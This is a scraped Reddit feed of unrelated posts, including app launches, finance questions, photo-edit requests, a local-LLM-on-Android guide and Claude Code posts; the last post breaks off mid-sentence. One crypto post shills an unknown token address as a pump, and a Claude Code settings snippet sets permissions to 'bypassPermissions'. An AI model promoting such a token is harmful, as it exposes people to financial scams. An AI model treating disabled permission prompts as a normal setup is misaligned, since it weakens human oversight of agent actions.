Just 20 mins of conversation with your favorite LLM and finding the right people + building real relationships, manually.

r/ProductHunters Ordinary_Outside_886

Localizing iOS apps shouldn't involve this much copy-pasting. Launching LangCat on Product Hunt today! 🚀

Hey everyone, solo dev here!

If you’ve ever had to manage .strings files or manually translate App Store metadata for 10+ languages, you know the "spreadsheet hell" I’m talking about. It’s slow, boring, and usually the biggest bottleneck when you're trying to take an app global.

I got so tired of the manual grind in Xcode that I built LangCat to automate the entire workflow. It handles:

  • In-app Strings: Automatically translates and syncs your localizable files.
  • App Store Metadata: Handles titles, descriptions, and keywords so your ASO stays consistent across regions.
  • Developer-First Workflow: Built by a dev, for devs—no enterprise bloat, just speed.

We are officially live on Product Hunt today! I’m looking for two things from this community:

  1. Honest Feedback: Is this a tool you’d actually use in your pipeline?
  2. Support: If you like what I’m building, a vote or a comment on our PH page would mean the world.

Check us out here: https://www.producthunt.com/products/langcat

I'll be hanging out in the comments here if you have any questions about the tech stack or how the automation logic works!

r/explainlikeimfive P0D3R

ELI5 Why have so many countries kept their gold reserves within the US?

Why would so many stable western democrasies opt to store their gold outside of their own countries?

r/SideProject Gold_Discussion_5488

I'm an ENT physician who built a tinnitus relief app as a side project — Tinnie

I've been treating tinnitus patients for years and got frustrated that most apps were just white noise generators. So I built Tinnie.

The idea: match your exact tinnitus sound first, then do gamified exercises (popping bubbles, catching fireballs, even penalty kicks) to redirect your brain's attention from the ringing.

Built it solo with Flutter. Now live on iOS. 14-day free trial included.

App Store: https://apps.apple.com/us/app/tinnie/id6760100346

No magic claims — tinnitus won't disappear, but the exercises are designed to help your brain focus elsewhere. That's it.

Happy to answer questions about tinnitus or the build process.

r/personalfinance bird_nerd18

Backdoor Contribution from Personal Investment Account

Hi All,

I have some money in a personal investment account that I would like to put in my Roth IRA for 2025. What is the best way (less taxes) to do a backdoor Roth IRA contribution with it? The Roth and personal investment account are at the same financial institution. I need to do a backdoor contribution because of my income limits. This will be the first year I’ve had to do that.

Thank you for your advice!!

r/funny Palpitation_Dramatic

Thanks

r/meme Federal767

One group chat, 4 generations

r/comfyui Ministerium-Wahrheit

Editing specific parts (masking) with flux model

Hi all,

I'm just getting started with the topic and one very useful workflow I found as a starting point is https://civitai.com/models/625887/simple-and-effective-flux1-img2img-upscale-comfyui-workflow

It works great, but now I am at a point where I want to edit specific parts of the picture. For example, make a picture of myself wear a cap and sneakers.

From what I understood (talking to Gemini) there are a couple of approaches to it. I had tried using ControlNet once, but even with my RTX 3090, there is no way my computer could handle that.

Therefore I ended up trying to do it with masking and the Youtube videos I found for that were seemingly outdated.

Is there perhaps anyone who could suggest me how to tackle this usecase having this workflow as a starting point?

What I am currently trying is to use a "Set Latent Noise Mask" node with "ImageCompositeMasked". Since the sections that are altered by AI (e.g. the shoes) are very distorted, I tried using "Image Blur" but that only slightly improves the situation.

Overall it feels like I'm doing it wrong, so I'd be very grateful for any suggestions

r/fakehistoryporn Chip_Vinegar

George Carlin performs his bit "Seven Words You Can Never Say on Television" in 1972.

r/instantkarma ConfidentTelephone81

The driver get what he gave

r/LocalLLaMA Different_Drive_1095

Running a local LLM on Android with Termux and llama.cpp

What I used

  • Samsung S21 Ultra
  • Termux
  • llama-cpp-cli
  • llama-cpp-server
  • Qwen3.5-0.8B with Q5_K_M quantization from huggingface
  • (I also tried Bonsai-8B-GGUF-1bit from huggingface. Although this is a newer model and required a different setup, which I might write about at a later time, it produced 2-3 TPS and I did not find that to be usable)

Installation

I downloaded the "Termux" app from the Google Play store and installed the needed tools in Termux:

 pkg update && pkg upgrade -y pkg install llama-cpp -y 

Downloading a model

I downloaded Qwen3.5-0.8B-Q5_K_M.gguf in my phone browser and saved it to my device. Then I opened the download folder shortcut in the browser, selected the GGUF file -> open with: Termux

Now the file is accessible in Termux.

Running it in the terminal

After that, I loaded the model and started chatting through the command line.

llama-cli -m /path/to/model.gguf 

Running it in the browser

I also tried to run the model in llama-server, which gives a more readable UI in your web browser, while Termux is running in the background. To do this, run the below command to start a local server and open it in the browser by writing localhost:8080 or 127.0.0.1:8080 in the address bar.

llama-server -m /path/to/model.gguf 

With the previous command I had only achieved 3-4 TPS, and just by adding the parameter "-t 6", which dedicates 6 threads of the CPU for inference, output increased to 7-8 TPS. This is to show that there is potential to increase generation speed with various parameters.

llama-server -m /path/to/model.gguf -t 6 

Conclusion

Running an open source LLM on my phone like this was a fun experience, especially considering it is a 2021 device, so newer phones should offer an even more enjoyable experience.

This is by no means a guide on how to do it best, as I have done only surface level testing. There are various parameters that can be adjusted, depending on your device, to increase TPS and achieve a more optimal setup.

Maybe this has motivated you to try this on your phone and I hope you find some of this helpful!

r/SideProject dietpapita

Filmmaker for 7 years. Making my first indie short film series entirely with AI. Here's Episode 1 :)

It took months of work and playing with different models to make something that actually feels like a real film. The hardest part was also to maintain consistency, along with maintaining photorealism. Would love to know what y'all think!

r/PhotoshopRequest linorinjo_real

Help with a DIY Ferrari 812 Hybrid Wall Clock (12h Scale / SVG / 30cm Print)

Hey everyone,

I’m working on a special project and could really use some help. I’m building a custom Ferrari 812 Superfast hybrid wall clock. The main tachometer scale will be the hour hand (sweeping 0-12), and a small OLED screen in the bottom-right cutout will show the digital minutes. The dial will be printed on a 30cm circular aluminum plate.

I’ve put together a base image, but it’s pretty messy from upscaling. Specifically, the small red RPM numbers like 7500, 8500, and 9500 are very blurry and unreadable now. Since the new scale needs to go up to 12, these red markings also need to be shifted about 2k further clockwise to match the new 12k/12h layout.

Could someone help me fix this up? Here is what I’m looking for:

  1. Update to a 12h Scale: My current version only goes to 10. I need the scale extended to 12 so the hour hand works for a full clock cycle. Please add the 11 and 12 in the same style as the other numbers.

  2. Shift and Fix Details: The small red RPM markings (7500, 8500, 9500 etc.) need to be recreated so they are sharp and readable again. They also need to be shifted further clockwise to align correctly with the new 12k limit.

  3. Clean and Sharpen: All the numbers (0-12), the central horse logo, and the scale markings need to have razor-sharp edges. No blur or noise from the upscaling.

  4. Solid Background: The yellow background should be one smooth, solid color without any artifacts.

  5. File Format: I’d love to get this as an SVG or a very high-res PDF to ensure zero quality loss for the 300mm print.

I’ve attached my current progress. I would be really grateful if someone could help me turn this into a professional file for my clock project.

Thanks a lot for your time!

r/PhotoshopRequest _Yashvardhan_

can somebody make this wallpaper 4k, please?

r/PhotoshopRequest garyfire

Please make both pictures sharper and sized to print for a 3 X 5 frame. Prefer no AI but will tip.

Looking to have both pictures sharpened and sized so I can print them on my 3 x 5 HP Sprocket. Thank you.

P.S. I would prefer no AI and plan on tipping.

r/ChatGPT PolylingualAnilingus

What's the wildest / most ridiculous thing your GPT has ever told you?

mine once told me Shrek was a Disney movie with full confidence, even after being challenged.

r/personalfinance Dovahkiin10101

Need some advice on credit card debt

Hey everyone. I’m 22m and I have saved up around 2,000 dollars, I work part time and my paycheques are usually around 600-700 dollars every two weeks as i’m in school.

I also have accumulated around 2,000 dollars in credit card debt that I haven’t paid off in full for awhile. I’m wondering if i should say screw it and use all my savings to start fresh with no credit card debt?

Or should I save more and then do it? I live at home so bills aren’t much of a worry either. I’m just scared about losing my savings, sorry if this is an obvious answer but i needed advice.

r/artificial tekz

Japan is adopting robotics and physical AI, with a model where startups innovate and corporations provide scale

Physical AI is emerging as one of the next major industrial battlegrounds, with Japan’s push driven more by necessity than anything else. With workforces shrinking and pressure mounting to sustain productivity, companies are increasingly deploying AI-powered robots across factories, warehouses, and critical infrastructure.

r/photoshop DoubleAd6205

How do I create an image of just text overlay?

https://preview.redd.it/2ex36qug6ltg1.jpg?width=383&format=pjpg&auto=webp&s=65424d5d0d1fb0befe77608d3ed095f7d6fd6a04

Hi All, I am new to photoshop and I cannot figure out how to remove text and save it as a separate file to place on a ppt. I removed the background and changed the text color with firefly because photoshop said it could not detect any background to remove. The firefly image, however, has a white/gray background that I need to remove so I can save the image as the colored text only. How can I do this? If it is not possible because the edits were on firefly, how can I change the color of the text only on photoshop itself? TIA

r/personalfinance Galyndan

Question about taxes on equity grants

My wife has a job at a publicly traded company.

This year, for her bonus (awarded in March) she received an equity grant in addition to a monetary award. Part of the equity grant vested immediately and more of it vests annually over the next few years.

What I've gathered is that the grant is considered income and that taxes are required to be paid on the shares in the calendar year that they vest based on their value at the time of vesting. The monetary portion of the bonus was paid out at the same time as the immediately vested shares, and while the taxes for the monetary payment were withheld as expected, the taxes for the shares were not withheld from the monetary award.

My questions:

  1. Do we just set the expected taxes aside and pay them at tax time next spring or are we supposed to prepay them in the same way that a self-employed person would pay income taxes quarterly?
  2. If we're supposed to prepay, how/where do we do that?
  3. If we're supposed to prepay and we don't, what is the penalty?
r/TwoSentenceHorror fj2612

As I fell into a coma, I realised I was fully conscious, and that I wanted to wake up just to hug my crying daughter.

I was mistaken, I should have never signed that DNR order.

r/ClaudeCode tread_lightly420

$$$ for the real users

Woohoo! 🎉 got my credit today and Claude is running great without the grifters beating the shit out of the opus api to clear their downloads folder.

Thank you anthropic! I hope the haters keep quitting and we can get back to the old claude with some extra dough.

r/TwoSentenceHorror Salty_Steak_1791

˝They are looking for her!˝

Billy (age: 10) said proudly looking at little Sally´s face on a milk carton.

r/n8n JrKh16

N8N vs MAKE

How are they different?

r/ClaudeAI Shorty52249

I was too lazy to pick the right Claude Code skill. So I built one that picks skills for me.

I have 50+ Claude Code skills installed - GSD, Superpowers, gstack, custom stuff. They're powerful. They 10x my workflow. I barely use them.

Not because they're bad. Because I forget which one to use when. Do I want brainstorm or gsd-quick? systematic-debugging or investigate? ship or gsd-ship? By the time I figure it out I've lost 5 minutes and the will to code.

So I did what I always do when something annoys me enough: I automated it.

I built /jarvis - a single Claude Code skill that takes whatever you type in plain English, reads your project state, figures out which of your installed skills is the highest ROI choice, tells you in one line what it picked (and why), and executes it.

/jarvis why is the memory engine crashing on startup

-> systematic-debugging: exception on startup, root cause first - bold move not reading the error message. let's see.

/jarvis ship this

-> ship: branch ready, creating PR - either it works or you'll be back in 10 minutes. let's go.

/jarvis where are we

-> gsd-progress: checking project state - let's see how far we've gotten while you were watching reels.

The routing has two stages:

Stage 1 - A hardcoded fast path for the 15 things developers actually do 95% of the time. Instant match.

Stage 2 - If Stage 1 misses, it scans every SKILL.md on your machine, reads the description field (same way you'd skim a list), and picks the best match semantically. New skill installed yesterday that Jarvis doesn't know about? Doesn't matter. It'll find it.

/jarvis write a LinkedIn carousel about my project

-> carousel-writer-sms (discovered): writing LinkedIn carousel content - found something you didn't even know you had. you're welcome.

The (discovered) tag means it found it dynamically. No config, no registry, no telling it anything.

It also has a personality. Every routing line ends with a light roast of whatever you just asked it to do. "Checking in on the thing you've definitely been avoiding." "Tests! Before shipping! I need a moment." "Walk away. Come back to a finished feature. This is the dream."

A bit of context on why this exists.

I'm currently building Synapse-OSS - an open source AI personal assistant that actually evolves with you. Persistent memory, hybrid RAG, a knowledge graph that grows over time, multi-channel support (WhatsApp, Telegram, Discord), and a soul-brain sync system where the AI's personality adapts to yours across sessions. Every instance becomes a unique architecture shaped entirely by the person it serves.

It's the kind of AI assistant that knows you. Not "here's your weather" knows you. Actually knows you.

Jarvis was born out of that project. I was deep in Synapse development, context-switching between 8 different Claude Code workflows per hour, and losing my mind trying to remember which skill to call. So I spent 3 days building a router instead of shipping features. 3 days. Because I kept laughing at the roasts and adding more.

Worth it!!

If Jarvis sounds like something you'd use, Synapse is the bigger vision behind it. Same philosophy: AI that handles the cognitive overhead so you can focus on actually thinking.

Synapse repo: github.com/UpayanGhosh/Synapse-OSS

Install Jarvis:

npm install -g claude-jarvis 

Restart Claude Code. That's it. It auto-installs GSD and Superpowers for you too, because of course it does.

I've freed up a genuine 40% of my brain that used to be occupied by "which skill do I need right now." That brainpower is now being used to scroll reels. Peak optimization.

Jarvis repo: github.com/UpayanGhosh/claude-jarvis

r/me_irl Several_Sandwich_732

me_irl

r/HistoryPorn clarky9712

British Army in Gibraltar 1949-1950s

I got home from work and had these placed on my bed. Figured I’d share

r/ClaudeCode Shorty52249

I was too lazy to pick the right Claude Code skill. So I built one that picks skills for me.

I have 50+ Claude Code skills installed - GSD, Superpowers, gstack, custom stuff. They're powerful. They 10x my workflow. I barely use them.

Not because they're bad. Because I forget which one to use when. Do I want brainstorm or gsd-quick? systematic-debugging or investigate? ship or gsd-ship? By the time I figure it out I've lost 5 minutes and the will to code.

So I did what I always do when something annoys me enough: I automated it.

I built /jarvis - a single Claude Code skill that takes whatever you type in plain English, reads your project state, figures out which of your installed skills is the highest ROI choice, tells you in one line what it picked (and why), and executes it.

/jarvis why is the memory engine crashing on startup

-> systematic-debugging: exception on startup, root cause first - bold move not reading the error message. let's see.

/jarvis ship this

-> ship: branch ready, creating PR - either it works or you'll be back in 10 minutes. let's go.

/jarvis where are we

-> gsd-progress: checking project state - let's see how far we've gotten while you were watching reels.

The routing has two stages:

Stage 1 - A hardcoded fast path for the 15 things developers actually do 95% of the time. Instant match.

Stage 2 - If Stage 1 misses, it scans every SKILL.md on your machine, reads the description field (same way you'd skim a list), and picks the best match semantically. New skill installed yesterday that Jarvis doesn't know about? Doesn't matter. It'll find it.

/jarvis write a LinkedIn carousel about my project

-> carousel-writer-sms (discovered): writing LinkedIn carousel content - found something you didn't even know you had. you're welcome.

The (discovered) tag means it found it dynamically. No config, no registry, no telling it anything.

It also has a personality. Every routing line ends with a light roast of whatever you just asked it to do. "Checking in on the thing you've definitely been avoiding." "Tests! Before shipping! I need a moment." "Walk away. Come back to a finished feature. This is the dream."

A bit of context on why this exists.

I'm currently building Synapse-OSS - an open source AI personal assistant that actually evolves with you. Persistent memory, hybrid RAG, a knowledge graph that grows over time, multi-channel support (WhatsApp, Telegram, Discord), and a soul-brain sync system where the AI's personality adapts to yours across sessions. Every instance becomes a unique architecture shaped entirely by the person it serves.

It's the kind of AI assistant that knows you. Not "here's your weather" knows you. Actually knows you.

Jarvis was born out of that project. I was deep in Synapse development, context-switching between 8 different Claude Code workflows per hour, and losing my mind trying to remember which skill to call. So I spent 3 days building a router instead of shipping features. 3 days. Because I kept laughing at the roasts and adding more.

Worth it!!

If Jarvis sounds like something you'd use, Synapse is the bigger vision behind it. Same philosophy: AI that handles the cognitive overhead so you can focus on actually thinking.

Synapse repo: github.com/UpayanGhosh/Synapse-OSS

Install Jarvis:

npm install -g claude-jarvis 

Restart Claude Code. That's it. It auto-installs GSD and Superpowers for you too, because of course it does.

I've freed up a genuine 40% of my brain that used to be occupied by "which skill do I need right now." That brainpower is now being used to scroll reels. Peak optimization.

Jarvis repo: github.com/UpayanGhosh/claude-jarvis

r/brooklynninenine Possible-Number8667

i don't like amy

i've seen b99 like seven times i'm it's biggest fan but honestly watching amy sometimes makes me want to choke myself 😭

to me she's just an annoying suck up/teachers pet and her overly smart demeanor is so irritating

can someone change my mind

r/ChatGPT shoud_i

What if your resume was built from their own job description? using AI

I got accepted for Anthropic's AI coding agent evaluation around the same time I was applying to jobs. And I kept getting rejected not because of my experience, not because I was applying randomly either. I was selective. Only roles that actually aligned with my skills.

Still nothing. Then I tried something different. Instead of sending the same resume everywhere I started building each resume from the job description itself.

The change was instant. 3 interviews out of the next 10 applications. That had never happened before. Not once in over 100 tries. So I built this around that exact idea.

Cvgoai went live 7 days ago and the response has honestly been way beyond what I expected. Comment "RESUME" below and I'll DM or click here Cvgoai a link with extra free credits no subscription, no card, nothing.

r/arduino holo_mectok

A shape shifting clock: Edgytokei

The Edgytokei which literally means edge clock is inspired from the Japanese nunchucks. Just like the nunchucks the clock is just a pair of two arms displaying time by balancing themselves on the edge. The clock consists of two arms and the base on which the arms are anchored. Both the arms are of equal length as the role of the arms changes with different hours of the day.

The fulcrum of the clock flips from the center to the left or right of the clock every quarter hour so that the clock can stand on the edge to represent the time between quarter past and quarter to hour. This flipping of the arms keeps the clock dancing on the edge throughout the day. The base which contains the electronics of the clock provides a anchor for the clock and prevents the arms from falling over.

The cylinders on the elbow of the arms contain the mechanics of the clock. Both the arms contain LEDs on the edge. Depending on which arm is representing the hours the led on that arm light up.

r/ChatGPT SCF87

Prompt Help

I need your help. I am creating stills for a novel. One of the images came out like this. But just one. He nailed the look and lighting I am looking for but I was never able to regenerate the look. I used several prompts but it never worked out. ChatGPT tells me I should use "pracitcal ambient light" and "motivated light only" but that doesn't do the trick. The Image was created using the following prompt: "photorealistic cinematic still, candid and unposed, natural body language, asymmetrical posture, subtle micro-expressions, captured in the middle of a real interaction, not aware of the camera, observational camera, slightly imperfect framing, realistic practical ambient lighting, motivated light only, grounded documentary-like realism, authentic fabric and skin texture, shallow depth of field, like a frame from a high-quality drama film"

What do I need to improve to get this... look, this natural lightning more often or better every time?

Forget about her hand... he only made this mess in this picture.

r/mildlyinteresting Internal_Engineer_

Candy I got from a resort in Mexico that looks like the flag

r/Frugal usually_scroller7327

Where to buy name brand clothing for cheaper for taller men

My husband is looking to buy clothing and shoes for cheaper but is wanting Nike, Under Armour, ect. He is 6ft 2 so he is needing tall length and he is also like 3xl or a 4xl (more for length than size). For shoes we are looking for like 13-14. I have looked online at Marshall’s and TJ Maxx but haven’t had much luck unfortunately. Is it better to shop in store vs online?

Any other ideas on where to shop would be helpful!

r/fakehistoryporn GPFlag_Guy1

The “Blue Marble” photograph taken by the Apollo 17 crew on December 7, 1972. (1972)

r/conan Real_Resident1840

Conan on "Smart Machines" (2015)

r/leagueoflegends Distinct_Arachnid_86

how to decide on a main role when liking many champions that just dont fit

How should i decide on a main role because i play mid atm , used to mian top but think adc is kind of fun but support too and a lot of the champs i play or like just dont work everywhere and should be otpd because they are difficuilt .
Some of them include ksante , jayce , zoe draven , ezrael and more .
I constantly swap roles because i like a champ play it but then swap roles because theres are other champs in the role i enjoy aswell and i was wondering if anyone could give some tips on how to come to a conclusion.

r/LocalLLM voidoax

AMD Ai Max+ 395 on llamacpp

Hey, been testing some models on RunPod last week (RTX Pro 6000) — Qwen3-Coder-30B-A3B, Qwen3.5-35B-A3B and gpt-oss-120b via vLLM. Wanted to see what would run well on my AMD Ryzen AI Max+ 395 locally.

Now I'm seeing that vLLM has poor ROCm support and llamacpp is the better choice for AMD. My question is: how good is llamacpp for tool calling compared to vLLM? I need this for agentic coding workflows where reliable function calling is critical.

Anyone with experience on the AI Max+ 395 specifically?

r/toastme sealhaven

feeling guilty, insecure, but surprisingly careless as well (19F)

Maybe it's its bc I recently switched the brand of sertraline, but lately I've been feeling really off. Be it concerning myself or others, it feels so... off. With my boyfriend, I used to be affectionate and kind, but now I'm distant, cold, and passive-aggressive. Maybe it's because of the resentment concerning our past arguments, but it's like a god forsaken episode. With friends I'm aight for the most part, but it feels fake, like i’m just putting on a front. With my parents, especially my mom, it's a whole different story. Sometimes it's good, sometimes it's shit. But I'm distant from them as well. Anyway, I just don’t fully understand what's going on with me. Frankly, I think body dysmorphia plays a big role in this, and I'm scared I might relapse back into my eating disorder because of how insecure I feel. The comparison photos show just that. And, overall, I feel disconnected from reality, which is weird since I've been taking 100 mgs of Sertraline as prescribed, and it wasn't like this before. I felt happy for once in my life. But as of late? Fuck no. I want to workout, draw, go outside, anything really, but I can't bring myself to do anything. And the worst thing is I don't even feel like a failure. I'm just fading away and wasting my days, not really caring. I feel numb and indifferent to everything, including myself. To summarize this shit, I feel lost, like I'm slowly ruining my mental health while also being completely aware of it. It seems as though my brain will never be fully repaired, so I'm just opting for a lobotomy ATP.

r/automation madeo216

I built a fully automated daily AI news podcast using Claude Code + ElevenLabs

I wanted to share a project I recently launched: a daily AI news podcast that runs entirely on its own. The whole thing started as me wanting to prove I could build something end-to-end with AI tools. It is called Build By AI and it's now live and publishing episodes regularly.

Claude Code helped to code the whole thing besides that i Used ElevenLabs to convert script to audio and Buzzsprout via their APIs.

Happy to answer questions about the pipeline or any of the tools! Would you actually listen to one, knowing there is no human host behind it? Or does that put you off?

r/personalfinance CHACHING_moneyTips

Should I take out a college loan if I don’t need it?

So I have been accepted to college. I’ll have to pay about $6000 a year to attend. I currently work a job and expect to have $20,000 in my HYSA by the end of the summer. If my parents and grandparents chip in, this should be enough to pay for all four years, especially if I get a job at college. However, I have been offered a federally subsidized loan for about $5000, so it seems to me that if I took this loan, id only have to pay $1000 a year and id be able to continue earning interest on my savings, then I could pay all the loans off when I graduate and I wouldn’t have to pay interest on them. Is this advisable? Am I missing something? Thanks!

r/me_irl flippinsweetdude

me_irl

r/ClaudeCode W_32_FRH

Claude acting like crazy again

Either giving out shit quality full of hallucinations or ignoring basic instructions that it should have known for quite a long time and no matter what mistake it does make, it still burns through limits with speed of light, what happened to Claude? It has already been like this last year in August.

r/Damnthatsinteresting Worried-Owl-9198

Scientists have created the world’s first dinosaur leather handbag by growing T-Rex collagen in a lab

r/CryptoMarkets Due-Mousse1981

Time to invest on moon coin

6KByfCna35oaFJ6gXAM8XmX7YxCnRqRvYqczcU2Apump les invest before its too late

To the fucking moon

6KByfCna35oaFJ6gXAM8XmX7YxCnRqRvYqczcU2Apump

r/PhotoshopRequest kazatma

Help fix a blurry picture - Offering to pay $10 CAD

My husband took a picture of my son that I really like, but it is unfortunately very blurry! (I am the photographer in the family, and I rarely get any pictures with my kids). Can you please help make it not blurry? I have uploaded other reference pictures from the same day.

Blurry Picture: https://imgur.com/a/8UWqjRy

Reference Pictures: https://imgur.com/a/9kILIUQ

r/AI_Agents flerken_____

Worth giving up?

Quick post. I build ai receptionists for businesses in my state. And I was lucky enough to get a paying client within 1 week of cold calling. That was nearly a month ago now… since then I haven’t been able to land any clients or even get warm ish leads at all, is this normal or am I hitting a realisation that this isn’t a good business model and I needa move on and get a 9-5 again.

r/coolguides Artemistical

A cool guide to the most expensive states to own a car

r/PhotoshopRequest bgjones2019

Need to be able to print 4” x 6” copies of each photo before flying out later this afternoon (east coast). Looking for cleaner versions of originals. Able to pay $15 for best submits given the short timeline working against. Appreciate your time and professional skills.

Many thanks.

r/illusionporn bigjobbyx

Invasion

r/AI_Agents Future_AGI

We found out our voice agent was giving wrong information from a user complaint. Here is what we changed.

the most common way to discover your voice agent is broken is from a user complaint.

the problem with that is users do not always complain. sometimes they just leave.

we shipped a voice agent, tested it internally, felt good about it, and put it live. the internal tests were clean. a few test calls, a few edge cases, everything passed. what we missed was that our testing was designed around how our team talks, not how real users talk.

real users interrupt mid-sentence. they get impatient. they go off-script in ways you never anticipate. they hang up and call back halfway through a flow. none of that shows up in a manual test call.

what we changed:

instead of writing test scripts, we started defining personas. a persona has a backstory, a mood, a communication style, and a goal. the SDK takes that persona and runs a full voice conversation with the agent, real speech, interruptions, impatience, the whole thing.

after each call you get:

  • a full transcript
  • auto-eval scores across task completion, tone, harmful advice, and refusal rate

nobody sits and listens to recordings. the eval runs automatically and surfaces failures.

what it caught:

one team ran 10 personas in their first session. the agent was quoting a return policy that had been killed six months ago. live in production. nobody knew until a synthetic persona caught it.

that is the class of failure that manual testing will never reliably surface.

the setup:

  • install agent-simulate and set up a local LiveKit server
  • define your agent config: model, voice, temperature, system prompt
  • write your first persona with mood and backstory
  • run the simulation, read the transcript
  • auto-evaluate against four metrics
  • full loop in about 15 minutes

full guide in the comments.

Really, we want to know how are others currently stress-testing voice agents against real user behavior before shipping?

r/personalfinance More_Slice_8303

Switched jobs, 401k transfer or cash out to pay off HELOC?

46y/o married, recently took a new job which will require me to move out of state in approximately 1 year. I would like to purchase a house in the new state. New state has no income taxes and will be a 6.5% pay increase. The new employer will increase my pay to be on site full time in lieu of remote.

$115k salary($83k net), $88k in 401k, contributing 5% to new 401k

$165k mortgage at 15 years at 6.375%($1,850 monthly with Escrow), $60k in HELOC from house projects and repairs, Car payment $675 per month($16k balance at 5.24%)

Current home was appraised at $330k, this is $105K equity before commissions. I would like to keep my mortgage at a 15 year due to my age. This is just enough for a down payment for a modest house with minimal required repairs. I will be house poor with this move, I feel like the extra $60k from the sale freed up by having no balance on my HELOC would be more beneficial as a down payment for the new house.
Between medications and expenses, I don't usually have much money left over at the end of a month. I always feel pressured to pay my HELOC down and put all my extra money on that balance each month.

No savings, no other retirement fund. Does it make sense to cash out, pay off the balance, start a savings and increase my contributions?

r/VEO3 any1particular

Eye Water (Future Jazz)

![video]()

Music is original. Images made with Midjourney and animated with Veo 3

r/megalophobia Galamou

The Disappearing Skyscraper

The view of the DC Tower 1 in Vienna.

Taken with a Minolta Dynax 5 film camera, no further photoshop applied.

r/ClaudeCode Budget-Juggernaut-68

Claude code harness to automate workflow

I'm looking for advise on how to write repeatable workflows for Claude code to better analyze documents and then writing reports for them.

We have internal databases containing various files and documents and I'll like to enable users to better perform research. I would like for Claude code to be the agent harness to conduct the research, and be the first layer of filter.

I've written scripts that enabled it to conduct searches and it is pretty decent at making queries and pulling data. It also is able to pull the right information then writing reports for them.

I'll like it to perform these tasks for different research questions we have and identifying data points that may help us answer those questions. some of this questions are evergreen and we will need to do repeatedly and I'll like to schedule Claude code to perform these tasks.

I'm aware that we can build pipelines ourselves to control how it does the tasks deterministically, but the flexibility will help a lot.

r/OldSchoolCool AlKhwarazmi

Jennifer Connelly, circa 1991-92

r/conan SYMPUNY_LACKING

Sona's Street Fight Story

r/comfyui Hasmie

Workflows to make an potrait image older?

I've been looking and trying to make a person older using comfyui, anyone has the workflows?

r/personalfinance michaelpartee12

Paying off Debt to get Cashflow back

My wife and I have a total debt of the image attached. We make monthly $8,570.12 after tax, we are striving to pay it all off by the end of the year (just trying to be aggressive). We are trying to put away for a down payment for our future home. Any advice is welcome!

Debt 1: $5933.68, $159 min, 26.49% apr

Debt 2: $6174.10, $193 min, 27.49% apr

Debt 3: $2004.80, $433.36 min, 0%

Debt 4: $9158.19, $205 min, 25.49% apr

r/SideProject Illustrious-Bug-5593

I left an AI loop running overnight. Woke up to 20 shipped agents.

Repo: https://github.com/Dominien/agent-factory

So last month Karpathy dropped autoresearch. Autonomous loop, runs experiments overnight, keeps what works, throws away what doesn't. I watched it blow up and thought, this pattern is sick. But I don't do ML. What I do have is a problem that's been eating at me: finding good ideas to build.

In 2026, finding a problem worth solving is harder than actually solving it. Every obvious pain point has 12 SaaS tools already fighting over it. The interesting stuff is buried in Reddit threads at 2am where someone rants about something nobody's built for. I used to scroll those manually. Now I don't.

I took that same loop and pointed it somewhere else. My system scrapes Reddit, HN, GitHub, and Twitter for real problems. Scores them on demand, market gap, feasibility. If something clears the threshold it builds a standalone AI agent, validates it works, and commits it. The threshold ratchets up every build so the ideas have to keep getting better.

Here's the part that surprised me. The system rejected over 80 ideas before shipping 20. Resume ATS optimizer? GAP: 0, there's already 10+ free tools. Salary negotiation advisor? GAP: 0. Insurance policy analyzer? GAP: 0. Food ingredient scanner? Yuka has 8M users. The research log reads like a graveyard of "obvious" ideas that are already solved. But then it found wage theft affects 82M workers and there's no free tool that combines FLSA exemption analysis with state specific overtime calculation. Built wage-rights-advisor. Found that only 5% of homeowners appeal their property tax but 30 to 94% who do succeed. Built property-tax-appeal-advisor. Found that 70M Americans get contacted by debt collectors annually and every AI tool in that space serves the collectors, zero serve consumers. Built debt-collection-rights-advisor.

Now let me be real. How do you verify the quality? Not fully automated. The system boots each agent, sends a test prompt, checks if the output is useful. But these are MVPs. Some are rough. The research log with all the scored and rejected ideas, that's almost more valuable than the agents themselves. I wake up, look at what shipped, look at what got rejected and why, and pick the most promising direction. It's an idea machine that also writes the first draft of the code. When every obvious idea feels taken, the 80+ rejected ideas with documented reasoning for why they failed is honestly the best part.

Three files. program.md tells Claude Code where to research and what bar to hit. seed/ is a minimal Next.js template with 7 tools. run.sh launches Claude Code headless and auto restarts on context limits. No LangChain, no CrewAI. TypeScript, MIT, runs on OpenRouter or Ollama. Each agent is standalone, clone and run.

r/leagueoflegends HyperShadow95

How do challenge leaderboards work? Am I actually number 1 for dps threat average in aram?

Honestly was curious. My friends and I were discussing challenge leaderboards last night? Is the #1 next to it number 1 on NA server? As i seem to be in 10000-50000 in every other one if not lower this seems quite unrealistic. If anyone knows how these leaderboards work and could enlighten us that would be great.

https://preview.redd.it/rscqm9if3ltg1.png?width=419&format=png&auto=webp&s=c85f382c6a2c76ae3bda7b965613891daa785986

r/OldSchoolCool TheThrowYardsAway

Partying on Labadi Beach, Ghana, West Africa - 1967...

r/ClaudeCode takeurhand

Claude 4.6 Opus on MAX EFFORT is a joke

I only use max. Even for hello. Even for tiny tasks. Everything max. I never talk to weak models. I never talk to second tier models. I only use the best setup. So this kind of dumb output is crazy to me.

I pay for the 20x tier. I use the max budget, max effort, max max max.....

My setup:

json { "effortLevel": "high", "env": { "CLAUDE_CODE_EFFORT_LEVEL": "max", "CLAUDE_CODE_SUBAGENT_MODEL": "opus", "ANTHROPIC_DEFAULT_HAIKU_MODEL": "claude-sonnet-4-6", "CLAUDE_CODE_MAX_OUTPUT_TOKENS": "128000", "CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS": "1", "DISABLE_TELEMETRY": "1", "DISABLE_AUTO_COMPACT": "1", "CLAUDE_AUTOCOMPACT_PCT_OVERRIDE": "95" }, "permissions": { "defaultMode": "bypassPermissions" } }

Here is exactly what happened.

I used /add-dir to load my workspace. Five directories, all my active projects:

/Users/cai/developer/github/golemancy_all (main workspace) /Users/cai/developer/github/golemancy (desktop app) /Users/cai/developer/github/golemancyweb (website) /Users/cai/developer/github/v0-zza-ai-next (SaaS frontend) /Users/cai/developer/github/zza_all.worktree/zza_all@codex

All five directories. All in context. The model knew exactly where everything lived.

I asked: "which directories did you load" It listed all five. Fine.

I typed: "write a markdown" It asked: "what do you want to write? a readme? docs? something else?"

I typed: "docs" It asked: "what's already in docs? what kind of doc do you want?"

The answer was sitting right there in context. One existing file: _doc/ecosystem-architecture.md. Five loaded directories. It just needed to write something useful next to the one file that already existed. That is it.

I told it to fuck off.

It said "got it, going straight in" and then immediately stopped to read the existing file anyway.

Then it spent 79 seconds thinking. Then it wrote this:

